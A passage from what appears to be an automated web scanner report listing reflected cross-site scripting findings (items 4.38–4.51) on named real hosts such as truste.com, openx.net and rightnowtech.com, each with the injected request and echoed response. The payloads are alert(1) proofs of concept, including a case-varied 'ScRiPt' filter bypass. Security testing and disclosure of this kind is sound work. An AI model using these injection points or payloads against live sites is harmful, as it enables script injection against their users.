Referer: http://arfug.groups.adobe.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 07 Sep 2011 16:53:56 GMT
Date: Wed, 31 Aug 2011 16:53:56 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"7", c2:"7400849", c3:"1", c4:"", c5:"", c6:"71b02<script>alert(1)</script>f6273d72731", c10:"", c15:"", c16:"", r:""});

4.38. http://bcvipca02.rightnowtech.com/Chat/chat/rightnow [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bcvipca02.rightnowtech.com
Path:	/Chat/chat/rightnow

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b3f1a<img%20src%3da%20onerror%3dalert(1)>a456b84bccc was submitted in the REST URL parameter 3. This input was echoed as b3f1a<img src=a onerror=alert(1)>a456b84bccc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /Chat/chat/rightnowb3f1a<img%20src%3da%20onerror%3dalert(1)>a456b84bccc?pool=3571:5&action=PROACTIVE_QUERY&avail_type=agents&p_db_name=rightnow&p_intf_id=1&queue_id=61&responseType=JSON&callback=rntJSONpac_1 HTTP/1.1
Host: bcvipca02.rightnowtech.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/search/?q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Cache-Control: max-age=0,no-cache,no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 472
Server: Jetty(6.1.25)

rntJSONpac_1({"error":{"chatSystemError":{"text":"Unknown or misconfigured site specified in '/rightnowb3f1a<img src=a onerror=alert(1)>a456b84bccc' AT Wed Aug 31 11:18:05 PDT 2011","chatMessageType":"ChatSystemError","type":{"value":"CANCEL","chatMessageType":"ChatErrorType"},"errorCondition":{"value":"SERVICE_UNAVAILABLE","chatMessageType":"Cha
...[SNIP]...

4.39. http://bcvipca02.rightnowtech.com/Chat/chat/rightnow [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bcvipca02.rightnowtech.com
Path:	/Chat/chat/rightnow

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload da0b6<script>alert(1)</script>d4681e8f055 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Chat/chat/rightnow?pool=3571:5&action=PROACTIVE_QUERY&avail_type=agents&p_db_name=rightnow&p_intf_id=1&queue_id=61&responseType=JSON&callback=rntJSONpac_1da0b6<script>alert(1)</script>d4681e8f055 HTTP/1.1
Host: bcvipca02.rightnowtech.com
Proxy-Connection: keep-alive
Referer: http://www.rightnow.com/search/?q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Cache-Control: max-age=0,no-cache,no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 121
Server: Jetty(6.1.25)

rntJSONpac_1da0b6<script>alert(1)</script>d4681e8f055({"queueId":61,"availableAgentSessions":8,"expectedWaitSeconds":0});

4.40. http://bcvipca02.rightnowtech.com/Chat/chat/rightnow [callbackArgument parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bcvipca02.rightnowtech.com
Path:	/Chat/chat/rightnow

Issue detail

The value of the callbackArgument request parameter is copied into the HTML document as plain text between tags. The payload ae9d7<img%20src%3da%20onerror%3dalert(1)>ceff7420d19 was submitted in the callbackArgument parameter. This input was echoed as ae9d7<img src=a onerror=alert(1)>ceff7420d19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /Chat/chat/rightnow;jsessionid=1a724kt3h9vx819uympgg8zeuo?pool=3571:5&site_name=rightnow&responseType=JSON&callback=RightNow.Chat.Controller.ChatCommunicationsController.onPostMessageSuccess&callbackArgument=0ae9d7<img%20src%3da%20onerror%3dalert(1)>ceff7420d19&action=SEND_TEXT&msg=Hi-&offTheRecord=false HTTP/1.1
Host: bcvipca02.rightnowtech.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://crm.rightnow.com/app/chat/bdr_chat_landing/first_name/Hoyt%20LLC/last_name/Research/email/rtfm%40fastdial.net
Cookie: JSESSIONID=1a724kt3h9vx819uympgg8zeuo; BIGipServer=83893258.35125.0000

Response

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Cache-Control: max-age=0,no-cache,no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 628
Server: Jetty(6.1.25)

RightNow.Chat.Controller.ChatCommunicationsController.onPostMessageSuccess({"data":["0ae9d7<img src=a onerror=alert(1)>ceff7420d19"],"chatMessageType":"ChatMessage","responses":[{"sessionId":"1a724kt3h9vx819uympgg8zeuo","chatSystemError":{"text":"JSESSIONID not specified or invalid","chatMessageType":"ChatSystemError","type":{"va
...[SNIP]...

4.41. http://bid.openx.net/json [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bid.openx.net
Path:	/json

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload ea276<script>alert(1)</script>2c8c12f6b22 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?c=OXM_52405312703ea276<script>alert(1)</script>2c8c12f6b22&pid=08d931ef-b202-210f-afa6-864a92315113&s=728x90&f=4.00&cid=Allmenus&url=http%3A%2F%2Fwww.allmenus.com%2Fny%2Fnew-york%2F297850-underground-pizza%2Finfo%2F HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://cdn2.allmenus.com.s3.amazonaws.com/v50/common/static/advertisements.html?server=www.allmenus.com&slot=am_50_header_leaderboard&ignore=true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=d8661604-aefb-4946-9a31-42430906ad5a; s=1492b9da-5863-4500-b6dd-490569492c7f; p=1313102815

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: p=1313102976; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_52405312703ea276<script>alert(1)</script>2c8c12f6b22({"r":null});

4.42. http://brocade.netshelter.net/fixed_placement.js.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://brocade.netshelter.net
Path:	/fixed_placement.js.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16f4f"%3balert(1)//73dd2287075 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 16f4f";alert(1)//73dd2287075 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /fixed_placement.js.php?publisher=info/16f4f"%3balert(1)//73dd2287075rmit HTTP/1.1
Host: brocade.netshelter.net
Proxy-Connection: keep-alive
Referer: http://www.informit.com/index.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Wed, 31 Aug 2011 17:54:51 GMT
Server: Apache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.4
Content-Length: 42174
Connection: keep-alive

var NS_37_1_useDoubleClickCodes = ('%c'.length != 2);

//Include NAP
window.blockNSPageTrack = true;
/* IE doesn't support indexOf, so we must teach it. Normally, we wouldn't muck with
* Array.prot
...[SNIP]...
orting as this
var NS_37_1_adSize="1x1";
// site name - any string - %s is the DART site variable - will be displayed in reporting as this
//var NS_37_1_adSite="%s";
var NS_37_1_adSite = "ns." + "info/16f4f";alert(1)//73dd2287075rmit";
// click tracker - %c is the DART click tracker variable and should go at the start if we want to track via DART
var NS_37_1_adClickTrack = (NS_37_1_useDoubleClickCodes ? '%c' : '') + "http://a
...[SNIP]...

4.43. http://brocade.netshelter.net/fixed_placement.js.php [publisher parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://brocade.netshelter.net
Path:	/fixed_placement.js.php

Issue detail

The value of the publisher request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a983"%3balert(1)//1a28d2ffdbe was submitted in the publisher parameter. This input was echoed as 5a983";alert(1)//1a28d2ffdbe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /fixed_placement.js.php?publisher=informit5a983"%3balert(1)//1a28d2ffdbe HTTP/1.1
Host: brocade.netshelter.net
Proxy-Connection: keep-alive
Referer: http://www.informit.com/index.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Wed, 31 Aug 2011 17:54:48 GMT
Server: Apache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.4
Content-Length: 42172
Connection: keep-alive

var NS_37_1_useDoubleClickCodes = ('%c'.length != 2);

//Include NAP
window.blockNSPageTrack = true;
/* IE doesn't support indexOf, so we must teach it. Normally, we wouldn't muck with
* Array.prot
...[SNIP]...
ing as this
var NS_37_1_adSize="1x1";
// site name - any string - %s is the DART site variable - will be displayed in reporting as this
//var NS_37_1_adSite="%s";
var NS_37_1_adSite = "ns." + "informit5a983";alert(1)//1a28d2ffdbe";
// click tracker - %c is the DART click tracker variable and should go at the start if we want to track via DART
var NS_37_1_adClickTrack = (NS_37_1_useDoubleClickCodes ? '%c' : '') + "http://adv.n
...[SNIP]...

4.44. http://choices.truste.com/ca [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://choices.truste.com
Path:	/ca

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 93aa0<script>alert(1)</script>b6f9f0e2631 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster93aa0<script>alert(1)</script>b6f9f0e2631&w=728&h=90&plc=tl&js=10 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Thu, 11 Aug 2011 22:42:09 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Content-Length: 6666
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
ntDivName:"te-clr1-089d84a6-40b6-4a3c-97bb-6a3467c2afba-itl",iconSpanId:"te-clr1-089d84a6-40b6-4a3c-97bb-6a3467c2afba-icon",backgroundColor:"white",opacity:0.8,filterOpacity:80,containerId:"cachebuster93aa0<script>alert(1)</script>b6f9f0e2631",noticeBaseUrl:"http://choices-elb.truste.com/camsg?",irBaseUrl:"http://choices-elb.truste.com/cair?",interstitial:te_clr1_089d84a6_40b6_4a3c_97bb_6a3467c2afba_ib,interstitialWidth:728,interstitialHei
...[SNIP]...

4.45. http://choices.truste.com/ca [cid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://choices.truste.com
Path:	/ca

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 9fd5c<ScRiPt>alert(1)</ScRiPt>babf8f62a72 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=hp01&aid=hp02&cid=684429359fd5c<ScRiPt>alert(1)</ScRiPt>babf8f62a72&c=cachebuster&w=728&h=90&plc=tl&js=10 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Thu, 11 Aug 2011 22:42:02 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Content-Length: 6707
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
<a href="http://preferences.truste.com/preference.html?affiliateId=76&pid=hp01&aid=hp02&cid=684429359fd5c<ScRiPt>alert(1)</ScRiPt>babf8f62a72" style="text-decoration:none" target="_blank">
...[SNIP]...

4.46. http://choices.truste.com/ca [iplc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://choices.truste.com
Path:	/ca

Issue detail

The value of the iplc request parameter is copied into the HTML document as plain text between tags. The payload 61c1b<ScRiPt>alert(1)</ScRiPt>41d7ee8671e was submitted in the iplc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att02&cid=0511wl300x250&c=att02cont10&w=300&h=250&zi=10002&plc=tr&iplc=ctr61c1b<ScRiPt>alert(1)</ScRiPt>41d7ee8671e HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286710721/direct;wi.300;hi.250/01/4315853561?click=http://r1-ads.ace.advertising.com/click/site=0000805773/mnum=0000949949/cstr=48274349=_4e445c22,4315853561,805773^949949^1183^0,1_/xsxdata=$XSXDATA/bnum=48274349/optn=64?trg=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Thu, 11 Aug 2011 22:51:01 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Content-Length: 26114
Connection: keep-alive

if(typeof truste=="undefined"||!truste){window.log=function(){log.history=log.history||[];log.history.push(arguments);
if(this.console){console.log(Array.prototype.slice.call(arguments))}};var truste=
...[SNIP]...
86_3385_4407_8f40_dda8554101d1_bi={baseName:"te-clr1-ba385e86-3385-4407-8f40-dda8554101d1",anchName:"te-clr1-ba385e86-3385-4407-8f40-dda8554101d1-anch",width:300,height:250,ox:0,oy:0,plc:"tr",iplc:"ctr61c1b<ScRiPt>alert(1)</ScRiPt>41d7ee8671e",intDivName:"te-clr1-ba385e86-3385-4407-8f40-dda8554101d1-itl",iconSpanId:"te-clr1-ba385e86-3385-4407-8f40-dda8554101d1-icon",backgroundColor:"white",opacity:0.8,filterOpacity:80,containerId:"att02con
...[SNIP]...

4.47. http://choices.truste.com/ca [plc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://choices.truste.com
Path:	/ca

Issue detail

The value of the plc request parameter is copied into the HTML document as plain text between tags. The payload a4a27<ScRiPt>alert(1)</ScRiPt>fbdb84a4c89 was submitted in the plc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90&plc=tla4a27<ScRiPt>alert(1)</ScRiPt>fbdb84a4c89&js=10 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Thu, 11 Aug 2011 22:42:46 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Content-Length: 6666
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
_clr1_5be9681c_fb8a_4240_bc85_12f3fa9e705e_bi={baseName:"te-clr1-5be9681c-fb8a-4240-bc85-12f3fa9e705e",anchName:"te-clr1-5be9681c-fb8a-4240-bc85-12f3fa9e705e-anch",width:728,height:90,ox:0,oy:0,plc:"tla4a27<ScRiPt>alert(1)</ScRiPt>fbdb84a4c89",iplc:"rel",intDivName:"te-clr1-5be9681c-fb8a-4240-bc85-12f3fa9e705e-itl",iconSpanId:"te-clr1-5be9681c-fb8a-4240-bc85-12f3fa9e705e-icon",backgroundColor:"white",opacity:0.8,filterOpacity:80,containerI
...[SNIP]...

4.48. http://choices.truste.com/ca [zi parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://choices.truste.com
Path:	/ca

Issue detail

The value of the zi request parameter is copied into the HTML document as plain text between tags. The payload aad66<ScRiPt>alert(1)</ScRiPt>2db9708dba3 was submitted in the zi parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att02&cid=0511wl300x250&c=att02cont10&w=300&h=250&zi=10002aad66<ScRiPt>alert(1)</ScRiPt>2db9708dba3&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286710721/direct;wi.300;hi.250/01/4315853561?click=http://r1-ads.ace.advertising.com/click/site=0000805773/mnum=0000949949/cstr=48274349=_4e445c22,4315853561,805773^949949^1183^0,1_/xsxdata=$XSXDATA/bnum=48274349/optn=64?trg=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Thu, 11 Aug 2011 22:50:56 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Connection: keep-alive
Content-Length: 26114

if(typeof truste=="undefined"||!truste){window.log=function(){log.history=log.history||[];log.history.push(arguments);
if(this.console){console.log(Array.prototype.slice.call(arguments))}};var truste=
...[SNIP]...
om/assets/adicon.png",icon_cam_daa:"http://choices.truste.com/assets/ad_choices_i.png",icon_cam_mo:"http://choices.truste.com/assets/ad_choices_en.png",iconText:"",aid:"att02",pid:"mec01",zindex:"10002aad66<ScRiPt>alert(1)</ScRiPt>2db9708dba3",cam:"2",cid:"0511wl300x250"};
truste.ca.bindingInitMap[te_clr1_032ab346_f24a_4019_a9ae_608b415f47fb_bi.baseName]=0;truste.ca.intInitMap[te_clr1_032ab346_f24a_4019_a9ae_608b415f47fb_bi.baseName]=te_cl
...[SNIP]...

4.49. http://coldbox.org/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://coldbox.org
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 788b9"><script>alert(1)</script>c9152f172a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico788b9"><script>alert(1)</script>c9152f172a HTTP/1.1
Accept: */*
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/)
Host: coldbox.org
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Page Not Found
Date: Wed, 31 Aug 2011 13:41:37 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 10681

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<meta http
...[SNIP]...
<input type="hidden" name="refRoute" value="http://coldbox.org//favicon/ico788b9"><script>alert(1)</script>c9152f172a" />
...[SNIP]...

4.50. http://content.atomz.com/autocomplete/sp10/04/3b/7b/ [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://content.atomz.com
Path:	/autocomplete/sp10/04/3b/7b/

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload d15fa<script>alert(1)</script>7b7135fe1a9 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /autocomplete/sp10/04/3b/7b/?max_results=200&jsonp=true&callback=preTermSuggCallbackFunctiond15fa<script>alert(1)</script>7b7135fe1a9&query=xs&d=jsonp1314795877616&_=1314795881111 HTTP/1.1
Host: content.atomz.com
Proxy-Connection: keep-alive
Referer: http://www.adobe.com/cfusion/search/index.cfm?loc=en_us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 13:05:18 GMT
Content-Type: application/json
Via: 1.1 content.atomz.com:84
X-Cache: MISS from content.atomz.com
Content-Length: 136

preTermSuggCallbackFunctiond15fa<script>alert(1)</script>7b7135fe1a9( [ "security issue sdk-22303: xss in express-install templates" ] )

4.51. http://content.bestbuyon.com/solr/select/ [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://content.bestbuyon.com
Path:	/solr/select/

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 1f1bd<script>alert(1)</script>a2d5e472f3f was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /solr/select/?callback=jsonp13131063158131f1bd<script>alert(1)</script>a2d5e472f3f&q=-tid%3A1487%20AND%20tid%3A1630%20AND%20ss_type%3Akaltura_entry2%20OR%20ss_type%3Agallery&start=0&rows=3&indent=on&fl=title,type,ss_type,ss_feature_desc,sis_field_dotcom_slot,sis_field_yellow_tag_rating,nid,ss_kaltura_entryId,ss_field_bbydotcom_main_image,ss_field_bbydotcom_main_image_cln,ss_field_bbydotcom_thumb_image,ss_field_video_thumbnail,created&wt=json&qt=standard&sort=sis_field_dotcom_slot%20asc,sis_field_yellow_tag_rating%20desc,created%20desc&json.wrf=bbyon.ajaxReturnTaxonometricSuccess HTTP/1.1
Host: content.bestbuyon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/

Response

HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Thu, 11 Aug 2011 21:11:00 GMT
ETag: "MTdlZmNmZTUxNDgwMDAwMFNvbHI="
Vary: Accept-Encoding
Content-Type: text/plain;charset=UTF-8
Content-Length: 2590
Date: Thu, 11 Aug 2011 23:44:31 GMT
Connection: close

bbyon.ajaxReturnTaxonometricSuccess({
"responseHeader":{
"status":0,
"QTime":0,
"params":{
   "json.wrf":"bbyon.ajaxReturnTaxonometricSuccess",
